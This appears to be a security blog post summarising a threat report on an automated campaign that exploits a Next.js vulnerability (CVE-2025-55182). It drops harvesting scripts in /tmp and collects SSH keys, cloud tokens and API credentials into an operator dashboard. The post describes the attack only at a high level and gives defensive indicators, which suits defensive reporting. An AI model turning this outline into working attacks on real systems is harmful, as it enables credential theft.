**Hacker Pranks**

**Large-Scale Credential Harvesting Operation Exposes 766 Hosts: What You Need to Know**

A recent large-scale automated credential harvesting campaign, tracked as UAT-10608 by Talos, has been exposing web applications and compromising sensitive data on a massive scale. The operation leverages a sophisticated framework dubbed "NEXUS Listener" to target Next.js applications vulnerable to the React2Shell (CVE-2025-55182) vulnerability.

The campaign's methodology involves identifying vulnerable endpoints, exploiting them with an initial React attack, and then deploying a multi-phase credential harvesting tool that collects sensitive data such as credentials, SSH keys, cloud tokens, and environment secrets. The framework uses a staged payload delivery model, dropping shell scripts in /tmp to collect and exfiltrate the compromised data.

**Automated Credential Harvesting: A Growing Concern**

The breadth of this campaign is staggering, with at least 766 hosts compromised across multiple geographic regions and cloud providers within a 24-hour period. The indiscriminate targeting pattern suggests that the threat actors are using automated scanning tools to enumerate publicly reachable Next.js deployments and probe them for vulnerabilities.

**NEXUS Listener: A Sophisticated Credential Harvesting Tool**

The core component of the framework is a web application that makes all exfiltrated data available to the operator in a graphical interface. This includes in-depth statistics, search capabilities, and browsing functionality to sift through the compromised data. The observed NEXUS Listener instances display "v3" in the title, indicating the application has undergone various stages of development before reaching its current version.

**Exfiltrated Data: A Goldmine for Threat Actors**

The analysis reveals that the framework collects a wide range of sensitive data from compromised systems, including:

* Third-party API credentials * Complete PEM-encoded private keys and authorized_keys entries * IAM role-associated temporary credentials (AWS) * Kubernetes tokens (GCP/Azure) * Docker container information

This exfiltrated data can be used to gain unauthorized access to cloud resources, perform lateral movement, or escalate privileges on compromised systems.

**What Can You Do?**

Organizations should take immediate action to investigate for signs of this campaign's activity on their web application hosts. This includes searching for the following artifacts:

* IOC indicators available on our GitHub repository * Presence of NEXUS Listener instances (version v3) * React2Shell (CVE-2025-55182) vulnerability * Suspicious shell scripts in /tmp

The sooner you take action, the better equipped you'll be to mitigate this threat and protect your sensitive data.

**Stay Vigilant**

This campaign serves as a stark reminder of the importance of robust cybersecurity measures. Stay informed about emerging threats, patch vulnerabilities promptly, and implement robust monitoring tools to detect suspicious activity on your network.

By being proactive and taking steps to secure your web applications, you can significantly reduce the risk of falling victim to large-scale credential harvesting operations like UAT-10608.

**References**

* Talos report: [link] * GitHub repository: [link]

Note: The post has been rewritten in a format suitable for an online blog.